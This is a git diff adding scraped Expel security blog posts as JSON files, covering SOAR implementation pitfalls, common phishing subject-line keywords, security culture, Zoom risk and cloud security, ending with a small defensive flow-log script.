to say that you\u2019re doing SOAR? What is SOAR? As it turns out, it all depends on how you interpret the definition of SOAR. Some say it\u2019s not SOAR unless it can operate independently without human intervention . Others claim SOAR is a ticketing system, or case management system, but not the IT ticketing system, but maybe not a ticketing system at all . All of these definitions and interpretations can make your head spin. Whether or not you believe robots can replace humans entirely (we don\u2019t, by the way), I don\u2019t think these disagreements about definitions matter much. For our purposes, let\u2019s define SOAR broadly. It\u2019s some set of technologies that helps you integrate the security tech you already have (and will add over time) and weave it together so it saves you time and helps your humans scale better. Yes, I understand that Python.org or /bin/bash probably both qualify as SOAR according to this definition. Let\u2019s assume for a moment I\u2019m not stressed out about that. A little history explains why. But what really is SOAR? Longer ago than I\u2019d like to think about, I worked on the security team at America Online. At the time, we had to build much of our technology in house because what was available commercially (or even as open source) wouldn\u2019t work at our scale \u201cout of the box.\u201d It\u2019s the same sort of problem folks like Netflix and Google faced years later. So we ended up building middleware (pretty sure this is what SOAR was called back then) to streamline a variety of security workflows to support identity and access management, authorization management and incident response. One of the initial challenges we had when trying to automate from point A to point Z was that the \u201cbusiness rules\u201d kept changing under our feet. That made it hard to code the steps in between. 
So we built a generic system to automate the parts that were largely static, left a few key steps in the middle for humans and then technology picked the workflows back up again and finished the process. Here\u2019s a quick IAM example: 1) let software collect information from managers about who needed access to what; 2) let the software provision access directly where APIs were available and 3) create tickets for humans where APIs were absent. Then, when all access was provisioned, handle the notifications and track the access over time to ensure it was disabled if not used in 90 days or if not renewed by managers after 365. Overall this system worked well, but maintenance costs were heavy because systems across the company kept changing \u2026 which meant the APIs and underlying data models changed constantly too. It should be called SORE Walk into any development shop and the engineers are probably familiar with the phrase \u201cit\u2019s like changing a jet engine mid-flight.\u201d It\u2019s the age-old problem of introducing (or replacing) technology without damaging the business. And it\u2019s HARD. Making significant changes to a technology platform that\u2019s used heavily (or used at all) is a painstaking endeavor \u2026 and when the technology in question was built over time \u2014 \u201corganically\u201d \u2014 rather than as part of a well thought out architecture that could withstand future changes, well \u2026 most engineering teams find themselves drowning in tech debt . So let me propose this: SOAR is not \u201corchestration and response.\u201d Those aren\u2019t the activities you\u2019re doing when you implement SOAR. SOAR is SORE. Jokes and conversations starters aside, it really should be \u201c Security Operations and Response Engineering .\u201d This is an engineering problem and should be treated as such. What do I mean by \u201cas such?\u201d I\u2019m glad you asked. Five pitfalls when implementing SOAR Because I\u2019ve learned the hard way what not to do, I\u2019m now sharing with you the five mistakes I wish I hadn\u2019t made. Pitfall 1: Automating everything The Great Chicago Fire of 1871 (hang with me here, I promise it\u2019s relevant) took out over three square miles of the city, hopped the river and displaced 100,000 people before it was done. At the time, Chicago\u2019s firefighters relied on horse-drawn carriages for fire engines. Imagine solving this problem with \u201cautomation.\u201d You could put Ferrari engines in fire trucks and the firefighters would have arrived faster. But it wouldn\u2019t have solved the problem. The firefighters were exhausted from putting out both small and large fires over the past week. Instead of jumping to automation as the solution, maybe it\u2019s worth taking a look at why there are so many fires in the first place. When your city\u2019s made primarily of wood and lumber yards are located on the banks of the river \u2014 which let fires quickly move from one side of town to another \u2014 you\u2019ve got some pretty compelling reasons to make architectural changes before turning to automation. SOAR is no different. Take the time to understand what\u2019s driving the volume of your work and see if there are architectural changes or tuning you can do upstream in your security infrastructure before you automate. Pitfall 2: Listening to your analysts Just kidding \u2014 you should totally listen to your analysts. But evaluate what they say in the context of data. 
As a general rule, if you ask an analyst what to automate, they\u2019ll describe an annoying time-consuming process they had to go through last Tuesday. What they won\u2019t tell you is that it\u2019s the only time they\u2019ve had to do that this month. It\u2019s a recent enough memory though and painful enough that they don\u2019t want to have to do it again \u2026 so that\u2019s what\u2019s top of mind. Beyond anecdotal recaps of something an analyst thought was tedious, you need metrics. As you figure out what to automate, metrics will help you make that decision and prioritize your engineering investments. Fixing an annoying workflow during an investigation might save one person a half hour once a month, but cutting one minute from a triage step (that nobody realizes they\u2019re doing because it\u2019s muscle memory at this point) could save everyone on your team a half hour a month. Good instrumentation and metrics management will help you figure out what to automate next (pro tip: check out tools like Datadog and Tableau to organize, visualize and analyze your data). Pitfall 3: Building brittle integrations I like to think about SOAR platforms as being measured best by TTP: time-to-Python. How much will your SOAR platform do for you before you have to write Python? It\u2019s usually measured in minutes. Beyond lambasting the limitations of SOAR, though, let\u2019s take a look at the software you write to achieve the orchestration you want. If your security team is like most, you\u2019re likely to swap out at least one technology in each tech category every four years or so. Maybe your SIEM (Security Information and Event Management) tech sticks around longer ( even though you wish it wouldn\u2019t ). To avoid the pain of \u201crebuilding everything\u201d each time to swap out a security product, you\u2019ve gotta make one crucial investment \u2014 adding an abstraction layer between \u201canalysis\u201d and \u201csecurity product.\u201d With an effective abstraction layer, you normalize data and queries across similar technologies. For example, one endpoint tech becomes no different from another upstream in the technology stack. Your analysts and your analytics can say \u201cget me this file,\u201d and your SOAR architecture will figure out how to do that with Tanium today \u2014 and it won\u2019t skip a beat if you try to do it with Carbon Black tomorrow. Anything short of this and you\u2019ve built a brittle integration that you\u2019ll need to rebuild later. While you\u2019re at it, watch out for other areas that might be brittle. If you\u2019re automating a process you don\u2019t understand well\u2026 it\u2019s liable to break readily. On the topic of things breaking\u2013expect your processes, your technology, and even your people to fail from time to time. The automation you build needs to stand up to those failure conditions without creating more work. Pitfall 4: Assuming you\u2019re getting better The old management adage goes like this: \u201cWhat gets measured gets done.\u201d If you really want to improve your orchestration and automation, it\u2019s vital you know where you are today to figure out (and celebrate) as you improve. Some of this you\u2019ll do through operational metrics that you\u2019ve put in place as part of a security operations and response program. Fixating on this, though, could cause you to lose sight of the big picture. 
Imagine for a moment you\u2019ve built a security operations program that operates effectively but is optimized to find and stop nation-state attackers. That\u2019s great if you\u2019ve got other countries all up in your business every other week, but less effective when garbage spear phishing results in business email compromise every day. You need both capabilities, and by fixating on just a subset of your metrics, you might be celebrating myopia. Security operations, whether SOAR-enabled or not, operates in the context of the broader risk management environment. If you\u2019re making conscious decisions across this broader scope, you\u2019re less likely to over-invest in one capability to the detriment of another that you need even more. There are lots of ways to get this done, but we\u2019re fans of the NIST Cybersecurity Framework. It\u2019s comprehensive, helps guide your thinking, and it\u2019s not hard to get started. As you continue developing your security program, take another measurement. Mixing internal assessments with less frequent external ones like NIST will ensure you\u2019re seeing the forest through the trees and help you mitigate your own bias. Pitfall 5: Getting comfortable It\u2019s rare to find a CISO who\u2019s complacent. Most are perpetually on edge, somewhat (who are we kidding?) paranoid and wondering if today is the day everything goes down in flames. Still, when you spend so much of your time making sure the plates keep spinning, it\u2019s tough to take the time to inject yet more chaos into the system to see how the team handles it. Staying with the big picture theme, tabletop exercises are great ways to think through how you\u2019d respond in the face of a real problem. When you think about getting comfortable in the context of SOAR, realize that the automation you\u2019ve built ages. The processes you\u2019ve solidified into automation may have worked well when they were built\u2026 but as the business has changed around your implementation, do the same assumptions hold true? Or is it time to re-think the process \u2013 and therefore the automation? One of the most effective ways to figure this out is through scenarios. We run tabletop exercises every quarter at Expel and it never ceases to amaze me the breadth of interesting discoveries we make, far afield from security technologies, let alone SOAR. It really puts things in perspective. Still, who really wants to sit in a room and plod through boring and stressful scenarios? Fortunately, we\u2019ve got something that might help. If you enjoy games (especially D&D) and are willing to shake things up a little with your executive team, check out Oh Noes! It\u2019s a security-focused tabletop exercise, D&D style. Bring some Doritos and you\u2019ve got a social event and risk-management exercise in one. Where do you go from here? Avoiding pitfalls seems like a tough thing to do today. \u201cOkay, I\u2019ll watch out for those problems,\u201d you might think. But we\u2019re all on a journey as we look to improve what we\u2019re doing from a day-to-day security perspective. Whether you\u2019re in the middle of SOAR implementation or it\u2019s still on the far distant horizon at your org, there are things you can do today to help you prepare or adapt. Take a measurement. Figure out where you are from a security program perspective. Inject some (healthy) chaos. Try Oh Noes! and entertain your team. Contemplate your metrics. Evaluate if you\u2019ve got the right ones in place. 
If you\u2019re still wondering if SOAR is right for your org or how you might go about implementing it, let us know \u2014 we\u2019d love to talk ." +} \ No newline at end of file diff --git a/the-top-phishing-keywords-in-the-last-10k-malicious.json b/the-top-phishing-keywords-in-the-last-10k-malicious.json new file mode 100644 index 0000000000000000000000000000000000000000..10278c229955c8e88c74a8fee75d2ba8cc5ae2d2 --- /dev/null +++ b/the-top-phishing-keywords-in-the-last-10k-malicious.json @@ -0,0 +1,6 @@ +{ + "title": "The top phishing keywords in the last 10k+ malicious ...", + "url": "https://expel.com/blog/top-phishing-keywords/", + "date": "Sep 8, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG The top phishing keywords in the last 10k+ malicious emails we investigated Security operations \u00b7 5 MIN READ \u00b7 RAY PUGH AND SIMON WONG \u00b7 SEP 8, 2021 \u00b7 TAGS: MDR / Phishing Did you get a chance to read our report on the top attack vectors used by bad actors in July ? If not, here are two important takeaways: Phishing was the top threat in July, making up 72 percent of the incidents our Security Operations Center (SOC) investigated. Breaking this down further, nearly 65 percent of the incidents our SOC investigated in July were Business Email Compromise (BEC) attempts in Microsoft Office365 (O365). TL;DR: Phishing is on the rise and we expect it to stay that way. So preventing BEC and credential harvesting through phishing should be a priority for resilience efforts. We decided to take a look at how bad actors are enticing their victims to open and engage with phishing campaigns. We analyzed the last 10 thousand malicious emails that our team investigated to determine the top keywords bad actors are using in their email subject lines. As you\u2019ll see below, these keywords aim to make recipients interact with the content of the email by targeting one or more of these themes: Imitating legitimate business activities Creating a sense of urgency Prompting the recipient to act In this post, we\u2019ll share the top keywords used in email subject lines, examples of subject lines from the malicious emails we investigated and some context around why bad actors might choose to use each keyword. Knowing how bad actors are targeting their victims can help inform your phishing strategy and education program. Top Phishing Keywords Invoice Real subject lines: RE: INVOICE Missing Inv ####; From [Legitimate Business Name] INV#### Context : Generic business terminology doesn\u2019t immediately stand out as suspicious and maximizes relevance to the most potential recipients by blending in with legitimate emails, which presents challenges for security technology. Most people are also inclined to respond promptly to communications from co-workers, vendors or clients if they believe action is required, like returning an invoice. New Real subject lines: New Message from #### New Scanned Fax Doc-Delivery for #### New FaxTransmission from #### Context : \u201cNew\u201d is commonly used in legitimate communications and notifications, and aims to raise the recipient\u2019s interest. People are drawn to new things in their inbox, wanting to make sure they don\u2019t miss something important. Message Real subject lines: Message From #### You have a New Message Telephone Message for #### Context : Most people using a work account want to make sure they\u2019re promptly responding to communications from co-workers, vendors or clients \u2013 and are inclined to read or listen to new messages quickly. 
Required Real subject lines: Verification Required! Action Required: Expiration Notice on [business email address] [Action Required] Password Expire Attention Required. Support ID: #### Context : Keywords that promote action or a sense of urgency are favorites among attackers because they prompt people to click without taking as much time to think. \u201cRequired\u201d also targets employees\u2019 sense of responsibility to urge them to quickly take action. Context : Blank subject lines generally evade automated security measures \u2013 security tech can\u2019t scan for phishing or spam keywords if there aren\u2019t any. File Real subject lines: You have a Google Drive File Shared [Name] sent you some files File- #### [Business Name] Sales Project Files and Request for Quote Context : \u201cFile\u201d is another generic business term used in work emails and notifications. Using this term helps these phishing emails blend in with legitimate emails \u2014 creating another challenge for security technology. Again, people are inclined to respond in a timely manner to communications from co-workers, vendors or clients. Request Real subject lines: [Business Name] SALES PROJECT FILES AND REQUEST FOR QUOTE [Business Name] \u2013 W-9 Form Request Your Service Request #### Request Notification: #### Context : Requests are sufficiently general for mass phishing campaigns, while insinuating the recipient needs to take action. Some examples include prompting the user to access a link, download a file or provide sensitive personal information. Action Real subject lines: Action Required: Expiration Notice on [business email address] Action Required: [Date] Action Required: Review Message sent on [Date] [Action Required] Password Expire Context : Promoting action and a sense of urgency increases the chances that a recipient will act immediately after reading the message without taking much time to think, rather than leaving the email for later and potentially forgetting to respond. Document Real subject lines: File Document #### [Name], You have received a new document in [Company system] Attn: [Name] \u2013 You have an important [Business name] designated Document Document For [business email address] View Attached Documents [Name] shared a document with you Context : Like \u201cfile,\u201d \u201cdocument\u201d is regularly used in subject lines and notifications, again helping the attacker target the most recipients and blend in with legitimate emails, challenging security technology. Once again, sharing a file prompts employees to respond in a timely manner to avoid missing work-related information. Verification Real subject lines: Verification Required! Context : \u201cVerification\u201d insinuates the recipient needs to take action, likely in a timely manner. Again, the user may be prompted to access a link, download a file or provide sensitive personal information. eFax Real subject lines: eFax from ID: #### eFax\u00ae message from \u201c[phone number]\u201d \u2013 2 page(s), Caller-ID: +[phone number] Context : eFaxes are still used broadly as part of normal business operations for many orgs, so users may be tempted to click the link or download the file. VM Real subject lines: VM from [phone number] to Ext. 
### on Tuesday, May 4, 2021 VM From ****#### Received \u2013 for <[user name]> July 26, 2021 \u2018\u201d\u201d\u201d1 VMAIL RECEIVED on Monday, June 21, 2021 3:02:55 PM\u201d\u201d Context : Most people using a work account want to make sure they\u2019re promptly responding to communications from co-workers, vendors or clients, and are inclined to read or listen to new messages quickly. What to do next Successful credential harvesting through phishing can lead to an array of problems for a business. Luckily, there are a lot of things you can do to try to stop bad actors in their tracks. Number one \u2013 enable multi-factor authentication (MFA) for everything you can. Specifically with phish resistant MFA (FIDO/WebAuth). Even if a bad actor manages to harvest credentials through phishing, MFA can keep them from accessing your systems and data \u2013 and give you a heads up that someone\u2019s trying to break in. Another important thing orgs can do to prevent successful phishing campaigns is to develop comprehensive phishing education programs. Orgs should stay up-to-date on the latest phishing trends to update their policies and educate employees when new tactics are at play. Beyond training sessions, regularly test employees with mock phishing emails (and provide feedback on what in the email was suspicious) so they continue to learn, hone their detection skills and know how to report suspicious emails in their inbox. Encourage employees to take a closer look at emails using the above keywords to make sure they recognize the sender, that the sender\u2019s email looks legitimate (for example, does that voicemail notification match the official voicemail email for your org?) and that they are expecting the content of the email. If not, it\u2019s always better to double check with the supposed sender through another form of communication (we love Slack!) before clicking on any unexpected files. When it comes to phishing, complacency is a risk. And we\u2019ve seen that employees from orgs with strong phishing education programs are better at identifying actual malicious emails. Beyond MFA and education, there are additional things you can do to make your email system more secure in case an attacker manages to harvest credentials from an employee. Here are some of our top resilience recommendations: Disable legacy protocols like IMAP and POP3. Implement extra layers of conditional access for your riskier user base and high-risk applications. For O365 users, consider Azure AD Identity Protection or Microsoft Cloud App Security (MCAS). Want to find out how we stop BEC here at Expel? Check out Expel for Email ." +} \ No newline at end of file diff --git a/the-zen-of-cybersecurity-culture.json b/the-zen-of-cybersecurity-culture.json new file mode 100644 index 0000000000000000000000000000000000000000..3b9c3840799ba06bb973d87b09c44e072ad0037d --- /dev/null +++ b/the-zen-of-cybersecurity-culture.json @@ -0,0 +1,6 @@ +{ + "title": "The Zen of cybersecurity culture", + "url": "https://expel.com/blog/the-zen-of-cybersecurity-culture/", + "date": "Nov 4, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG The Zen of cybersecurity culture Tips \u00b7 5 MIN READ \u00b7 YANEK KORFF \u00b7 NOV 4, 2022 If we live a life of unawareness, we may get caught in the never-ending cycle of reacting to life\u2019s circumstances \u2013 Mingyur Rinpoche Cybersecurity Awareness Month just wrapped. 
This year\u2019s campaign theme\u2014\u201cSee Yourself in Cyber\u201d\u2014demonstrates that while cybersecurity may seem like a complex subject, ultimately, it\u2019s really all about people. This October will focus on the \u201cpeople\u201d part of cybersecurity, providing information and resources to help educate CISA partners and the public, and ensure all individuals and organizations make smart decisions whether on the job, at home or at school\u2013now and in the future. ( Cybersecurity and Infrastructure Security Agency ) This year\u2019s emphasis on people was refreshing. CAM always results in lots of blog posts and media articles sharing advice that people should follow, and this content is typically packed with outstanding information. At some point, though, our success in combating cybercrime needs to evolve past the \u201cadvice\u201d stage and move into the culture stage. Instead of the bullet points being something we think about doing, they must become things we do all the time, without having to think . Let\u2019s turn this into year-round culture. There\u2019s no question that designating a whole month to cybersecurity best practices is important. But cybersecurity awareness should be part of our day-to-day lives . Relying solely on following step-by-step advice for disaster prevention only in the month of October has the potential to stunt our progress toward a world built on ingrained safety and well-being. Is there a better, more positive way of thinking about this? The Zen distinction between thought and awareness provides some insight into where we are and where we want to go. Awareness itself allows us to stand at the river\u2019s edge without getting sucked into the current\u2026 Thoughts are still there. They may be quiet or turbulent, focused or wild and scattered. But we have stopped identifying with them. We have become the awareness, not the thoughts. We can think about our awareness and we can be aware of our thoughts , and a fully realized cybersecurity culture is grounded in the higher-order state. Consider driving a car. Safe driver checklists like this one \u2014which includes 33 steps\u2014lay out all the rules, most of which we learned while studying for our driver\u2019s licenses. But when we get behind the wheel, we don\u2019t pause to tick off each bullet. Most of us automatically buckle up. We check our mirrors before backing out of the driveway. We signal when we want to turn. We obey traffic signals and signs without thinking about it. We don\u2019t drag race through school zones. We turn on our lights at dusk and slow down when it snows. And most importantly, we pay attention to the traffic around us, because we know that awareness is our best defense.* In other words, we\u2019re part of a culture of highway safety. We had it modeled for us by adults as we were growing up. We learned it in drivers ed and passed the tests when we turned 16. Through practice and repetition, we behave safely without thinking about it. We have become the checklist. This is where we need to get with cybersecurity. But how? Some thoughts. Training . It goes without saying (but we\u2019ll say it anyway) that training is essential. As we think about evolving toward a \u201czen cybersecurity\u201d culture, here are a few things to consider. Training should be continuous . It isn\u2019t enough to have an annual or even semi-annual event. 
A program that schedules more routine engagement with security keeps good practices front-of-mind and introduces information about new threats. Training must be engaging . How often have you taken \u201ctraining\u201d where you hit play, went to do something else, then came back to take the \u201ctest\u201d? This is, by definition, not training\u2013you don\u2019t learn anything new or novel. Also, is the training basically a glorified PowerPoint? Modern audiences are accustomed to entertaining narratives driven by strong visual communication (and new information is interesting). These experiences establish a sensory baseline, and you can\u2019t learn when you\u2019re asleep. There are many ways to be boring, and all of them make for weak training. Training should be success-focused . Disaster cases are easy to find and make for compelling stories. But training that models winning provides the carrot to balance the stick of the daily news. No shame, no fear, no threats\u2014these aren\u2019t dynamics you want at the center of your culture. Cases that illustrate how awareness and behavior won the day can associate strong security practices with satisfaction and accomplishment. Leadership suppor t. Employees are on the receiving end of lots of \u201ccompulsory\u201d communications, and while they know these periodic reminders (legal, compliance, security, etc.) are important, they can quickly tune out as soon as they realize that, oh yeah, we already know this. A good way to bypass the tune-out is to make sure executives address security as a matter of habit outside routine channels. Leaders can use personal communications, company calls, unscheduled emails to reinforce training themes, point to internal successes, praise specific employees for best practice behavior, and the list goes on. The point is to illustrate that leaders aren\u2019t just spouting boilerplate for legal \u201cCYA\u201d reasons. Culture ownership . One popular bit of advice is to assign the job of \u201cculture owner\u201d to a specific person. This is a good idea, especially in an institutional setting, because it elevates the profile of the evangelist and invests this person with the approval of leadership. It\u2019s only an interim step, though. Longer term, and beyond the walls of a single organization, everyone owns the culture. Socializing this message should be the culture \u201cowner\u2019s\u201d primary mission. Core value. Organizations have a set of fundamental principles that guide everything they do. \u201cCustomer focus\u201d is the prime directive for many businesses. Amazon is famous for its \u201cbias for action.\u201d Patagonia pledges to \u201cuse business to protect nature.\u201d At Expel, we take equity, inclusion, and diversity very seriously because we know it\u2019s the foundation for excelling at everything we do. Cybersecurity awareness not only safeguards the business, it promotes continuity and extends a halo of security to your customers, third parties, and communities. It can be an ideal pillar for a more productive value set. Normalize security discussions . Encourage employees to talk about security. Security awareness is routine in a mature cybersecurity culture. Over time, the goal is to replace FUD with a more casual \u201cenlightened paranoia.\u201d Yes, the bad guys are out to get us\u2014because that\u2019s what bad guys do\u2014but we have it under control and we aren\u2019t afraid. 
(Also, as the topic becomes normalized in the workplace, workers are more likely to take it home with them, helping spread awareness beyond the office.) Cybersecurity safeguards us from a volatile world of risk. But FUD and anxiety aren\u2019t sustainable responses . In her recap of this year\u2019s RSA Conference, Expel CMO Kelly Fiedler explained that \u201chope and encouragement [wins] over fear, uncertainty, and doubt.\u201d In an industry that often relies on FUD\u2026to compel action, the common thread from the keynote speakers was a message of hope. Notable leaders from industry giants (think: RSA, Cisco, and VMware) took to the stage to remind us that if we pull together, we have the power to change the world for the better . As we close out Cybersecurity Awareness Month 2022, let\u2019s sustain the momentum by remembering to see ourselves in cyber . This prescription may seem a little abstract to some, but the emphasis on people \u2014that\u2019s easy to identify with. People are our coworkers, our families, our friends, and our neighbors. The more our culture is driven by awareness instead of checklists, the more energy we have for pursuits that benefit our organizations and the communities we serve and live in. * Yeah, we know. Not everybody is great about all these things. Especially the one about turn signals." +} \ No newline at end of file diff --git a/thinking-about-zoom-and-risk.json b/thinking-about-zoom-and-risk.json new file mode 100644 index 0000000000000000000000000000000000000000..cb8e71be057f01f85f83c9ae3e83827dace7cc10 --- /dev/null +++ b/thinking-about-zoom-and-risk.json @@ -0,0 +1,6 @@ +{ + "title": "Thinking about Zoom and risk", + "url": "https://expel.com/blog/thinking-about-zoom-risk/", + "date": "Apr 21, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Thinking about Zoom and risk Security operations \u00b7 4 MIN READ \u00b7 BRUCE POTTER \u00b7 APR 21, 2020 \u00b7 TAGS: CISO / Company news / Get technical / Heads up / Managed security Like you, we\u2019ve been paying attention to the news about Zoom. In particular, we\u2019re looking into various security findings and concerns shared on social media and in news outlets. The situation changes by the day, but I want to give you a quick overview of our opinion on all the various security findings and our thoughts on managing risk from using Zoom. First, the TL;DR. We are continuing to use Zoom. We\u2019ve looked at the product, how we use it, the company, and the overall risk to Expel, and we\u2019re comfortable continuing to use it as part of our daily operations. How did we reach this conclusion? Read on. Dealing with third-party risk Stepping back from Zoom for a minute, when it comes to ANY external vendor, you\u2019re constantly balancing the reward of the service they offer with the risk of using that service. All of us (hopefully!) have a third-party risk program to document and guide the third-party risk management process. Not that long ago, managing third-party risk involved taking deep dives on individual products and asking: \u201cis this product suitable for use?\u201d But in a cloud native environment, the assessment has shifted. In a SaaS solution, a company can deploy updates to services without any notification that can dramatically change the product. It\u2019s nearly impossible to do a point in time assessment of their product and have it mean anything. 
Instead, we are now asking ourselves: \u201cis this company suitable for us to do business with?\u201d Let\u2019s look at Zoom and the company\u2019s actions to date. Zoom created a remote collaboration product with a relatively low learning curve, a common user experience across multiple platforms, and ran it in a reliable way. In 2020, they\u2019ve scaled from an average of 10 million meetings a day in January to 200 million meetings a day in March. They\u2019ve moved many of their engineering resources over to focus on security and privacy issues. Zoom released numerous security updates to both fix vulnerabilities and add new security features. The CEO has been interviewed several times, has been incredibly frank about their security challenges and indicates security is going to be a big part of Zoom going forward. Zoom also recruited skilled security professionals such as Katie Moussouris (and her company Luta Security) and Alex Stamos to make sure the right things are being done both internally and externally. All in all, Zoom is making all the right decisions and doing the right things to address security concerns and build a more secure product. They\u2019re not burying their heads in the sand and they\u2019re being very transparent. From a third-party risk perspective, Zoom is a company we want to do business with. What about the product? The product clearly still matters. So, let\u2019s take a look at the types of problems that were recently uncovered. Zoombombing. This is when uninvited people join Zoom meetings and cause disruption. It\u2019s a real problem right now. However, it appears to only occur during meetings with publicly accessible meeting IDs. This problem isn\u2019t limited to Zoom, unfortunately. The current spike in video conferencing leads to a spike in disruption as well. On April 15th, Fairfax County in Virginia had to cancel school for three days to develop countermeasures against students and other parties being disruptive using techniques such as racist and homophobic names and memes during distance learning classes. There\u2019s anecdotal evidence of some non-public meetings being Zoombombed but not enough to convince us that it\u2019s a real risk. Zoom quickly implemented countermeasures to dramatically slow the ability to find valid meeting IDs with brute force. Zoom also provided guidance to help run meetings more securely as well as grouped all the security controls under a big \u201csecurity\u201d button that hosts can use to quickly configure security options and maintain control of meetings. It seems that while Zoom can\u2019t control human nature, they\u2019ve put some controls at our fingertips to keep out those who want to disrupt or cause chaos in our meetings. Overall security of the Zoom app. Zoom can run in two ways: inside your browser or as a standalone application. The Zoom application has been getting a lot of attention lately and there have been several low-risk vulnerabilities discovered, including the ability to send malicious links in chat and to potentially be able to read Windows password hashes remotely. Also, security expert mudge had some choice words on the overall security of the Zoom binaries. In a nutshell, while the findings mudge talks about aren\u2019t security vulnerabilities on their face, they are indicative of a development process that doesn\u2019t have security baked into it. Zoom quickly addressed these issues but there are likely to be more discoveries in the coming weeks. 
Looking at Zoom the company, they appear to be taking these concerns to heart and are working to build more secure applications as time goes on. All the attention from both security researchers and malicious users alike will continue to press Zoom to make their core application more secure. Encryption. While Zoom indicated sessions were \u201cend-to-end\u201d encrypted, the actual architecture is end-to-Zoom and Zoom-to-end encrypted. While it\u2019s not ideal from a privacy perspective, Zoom meetings are encrypted on the wire. However, according to a Citizen Lab report even the encryption that\u2019s in place is home-rolled and generally not up to industry standards. While you\u2019re forced to trust Zoom to not intercept and do something malicious with your data, in general the real risk to this kind of communication is interception on the wire. And even if you capture data on the wire, you still have to do work to decrypt it. While weak encryption is never a good thing, in this case attackers have to be a) on the wire and b) motivated enough to perform the cryptanalysis to recover the cleartext data. These types of attackers are few and far between and generally tend to be interested in national security interests, not a meeting of your marketing department. Like everything else listed here, Zoom\u2019s working to address this encryption issue. In a webinar on April 15th, Zoom indicated they\u2019ll be migrating to AES 256 GCM (instead of ECB) in a \u201c matter of weeks \u201d and are working towards full end-to-end encryption. Again, do you trust Zoom on this? Given their transparency to date, we believe that this is really the goal they\u2019re working towards. If they focus the current discussions on end-to-end encryption and law enforcement access, they\u2019ll get to where they\u2019re trying to go. So what? Every day that passes is a day that Zoom is a little more secure than it was the day before. Given the current encryption concerns, it makes sense that certain government agencies have said \u201cno\u201d to Zoom use. But for most corporate applications (and certainly your family and community activities), we believe Zoom is suitable for use. Barring any major changes in Zoom\u2019s security posture, Expel will continue to use Zoom for our business needs. Have any other concerns about using Zoom? Let us know and we\u2019ll do our best to answer your questions." +} \ No newline at end of file diff --git a/this-is-how-you-should-be-thinking-about-cloud-security.json b/this-is-how-you-should-be-thinking-about-cloud-security.json new file mode 100644 index 0000000000000000000000000000000000000000..3d2422a09976d40ce06ee0a4057807b8342a0c9c --- /dev/null +++ b/this-is-how-you-should-be-thinking-about-cloud-security.json @@ -0,0 +1,6 @@ +{ + "title": "This is how you should be thinking about cloud security", + "url": "https://expel.com/blog/how-you-should-think-cloud-security/", + "date": "Jun 20, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG This is how you should be thinking about cloud security Security operations \u00b7 5 MIN READ \u00b7 MATT PETERS AND PETER SILBERMAN \u00b7 JUN 20, 2019 \u00b7 TAGS: CISO / Cloud security / How to / Managed security / Planning You can\u2019t set foot in any conference or read an article in your go-to tech trade without hearing about cloud. And we totally get the fandom. The cloud offers businesses of all shapes and sizes plenty of benefits, with the biggest one being that you can move faster to accomplish a business outcome. 
Cloud is the perfect example of a technology where you can pour money into it to achieve scale. But how exactly do you \u201cdo security\u201d in the cloud? Your IT team isn\u2019t racking and stacking servers like they used to \u2026 and it\u2019s much harder to see the endpoints you\u2019re now responsible for protecting. But please let us be the bearers of some good news: securing your data in the cloud is much easier to do than you think, as long as you\u2019re thinking about the cloud in the right way. The security challenges of cloud With the cloud comes some fundamental shifts in how companies do business and how IT and security think about tech. Here are the ones you need to care about, because they impact how you need to protect your org\u2019s data. Things move (a lot) faster. Sure, being able to go from nothing to a fully stood-up application in minutes is awesome, but it also puts a new burden on the security team (or your security \u201cperson\u201d if you don\u2019t have a full team). Specifically, traditional change control processes are easily outgunned, which means you don\u2019t have those as an easy way to get visibility into the changes your developers are making since they may no longer need permissions to spin up new databases. You still have visibility in the cloud, but that view is different than what you\u2019re used to. The types of visibility available in the cloud are not always the same \u2014 understanding what telemetry data is available from your cloud provider will help you find commensurate controls. For example, it may not be easy to get full Packet Capture (PCAP) but you can get flow logs from most cloud providers. You\u2019ll probably have a new/different pivot point. When you think about infrastructure, you usually pivot based on hostname, IP and sometimes the user. But in looking at detection and response for cloud applications like Office 365 and G-Suite the logs usually only contain a username. In these cases, the user identity becomes the new thread to follow. (Speaking of Office 365, we\u2019ve got an entire post right here about how to keep Office 365 secure. ) Our simplified 3-part take on cloud security We think about \u2018cloud\u2019 in three distinct parts. Each part corresponds to a pattern we see that implies certain business goals, and brings with it specific complexities and advantages. By understanding which \u2018cloud\u2019 you\u2019re talking about, you\u2019ll have a much better handle on what controls you\u2019ll be able to use effectively to protect your data. Part 1: Infrastructure Then \u2026 In the old world, your infrastructure was contained in a data center. There were physical walls around it with man-traps and guards. The network was similarly segmented, with (usually) well-understood ingress and egress points. Only a few people had permissions to make changes to the physical or logical infrastructure. As a result, concentrating visibility and control in a change control board (CCB) that met infrequently and authorized changes was pretty easy (and effective). Now \u2026 In the new world your data center is, at best, a logical construction. Physical walls are replaced with VPC configuration and your cohort of sys admins with root passwords are now replaced by API access and keys. Given that a team can spin up an entirely new infrastructure overnight with no real controls, it might seem like all hope to regain control and have oversight is lost. But it\u2019s not. 
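Speaking of visibility in this new, logical data center: even without full PCAP, the flow logs mentioned earlier are enough to start asking useful questions. Here is a minimal sketch, assuming AWS VPC flow logs in the default space-separated v2 record format; the allow-list of expected ports and the file name are made-up examples, not a recommendation for your environment.

# Flag accepted flows to destination ports we don't expect this subnet to serve.
# Assumes the default VPC flow log v2 record format:
# version account-id interface-id srcaddr dstaddr srcport dstport
# protocol packets bytes start end action log-status
EXPECTED_PORTS = {443, 22}  # hypothetical allow-list

def unexpected_flows(lines):
    findings = []
    for line in lines:
        fields = line.split()
        if len(fields) < 14 or fields[12] != "ACCEPT":
            continue
        srcaddr, dstaddr, dstport = fields[3], fields[4], int(fields[6])
        if dstport not in EXPECTED_PORTS:
            findings.append((srcaddr, dstaddr, dstport))
    return findings

with open("flowlog.txt") as fh:   # placeholder export of your flow logs
    for src, dst, port in unexpected_flows(fh):
        print(f"unexpected ACCEPT: {src} -> {dst}:{port}")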
